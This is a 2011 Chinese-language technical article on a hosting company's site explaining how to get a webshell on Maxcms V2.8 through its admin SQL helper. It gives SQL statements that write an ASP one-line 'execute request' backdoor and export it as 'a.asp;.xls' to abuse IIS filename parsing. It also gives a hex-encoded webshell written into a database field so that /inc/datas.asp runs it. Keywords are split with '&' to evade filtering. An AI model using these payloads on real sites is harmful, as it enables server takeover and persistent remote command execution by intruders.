您好,欢迎来到思海网络,我们将竭诚为您提供优质的服务! 诚征网络推广 | 网站备案 | 帮助中心 | 软件下载 | 购买流程 | 付款方式 | 联系我们 [ 会员登录/注册 ]
促销推广
客服中心
业务咨询
有事点击这里…  531199185
有事点击这里…  61352289
点击这里给我发消息  81721488
有事点击这里…  376585780
有事点击这里…  872642803
有事点击这里…  459248018
有事点击这里…  61352288
有事点击这里…  380791050
技术支持
有事点击这里…  714236853
有事点击这里…  719304487
有事点击这里…  1208894568
有事点击这里…  61352289
在线客服
有事点击这里…  531199185
有事点击这里…  61352288
有事点击这里…  983054746
有事点击这里…  893984210
当前位置:首页 >> 技术文章 >> 文章浏览
技术文章

Maxcms V2.8电影系统获取shell

添加时间:2011-1-25  添加: admin 
 

由于本人网站所在服务器会过滤某些关键字,过滤成****,所以这里的某些字符我给替换一下,你们懂的!请去掉&就可以了。
程序版本为Maxcms V2.8,而网络上有的获取 shell 版本在2.52.5中大部分方法都已经不行。
后台有个 SQL高级助手,于是立刻想到两种思路。第一是通过Access导出a.asp;.Xls的方式。另一种是一句话直接写入数据库,将其备份为asp程序执行。
第一种方法比较好实现。如下语句就可以办到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
独自等待补充:
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

其实使用这一句话就可以的,但是前提是表a是存在的,原作者的是可以成功的,这里只是多给一种方法。
第二种方式是采用将一句话写入数据库。备份出来,但由于数据库中存在着防下载表。就算写进了数据库也不一定爆得出源码,于是在SQL高级助手处使用如下语句。
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
原理就不多说了。自己百度,这样/inc/datas.asp就能爆出代码。
通过后台模板自定义标签处往数据库中写入一句话,然后从后台将数据库备份成asp文件

关健词:Maxcms

分享到:

顶部 】 【 关闭
版权所有:佛山思海电脑网络有限公司 ©1998-2024 All Rights Reserved.
联系电话:(0757)22630313、22633833
中华人民共和国增值电信业务经营许可证: 粤B1.B2-20030321 备案号:粤B2-20030321-1
网站公安备案编号:44060602000007 交互式栏目专项备案编号:200303DD003  
察察 工商 网安 举报有奖  警警  手机打开网站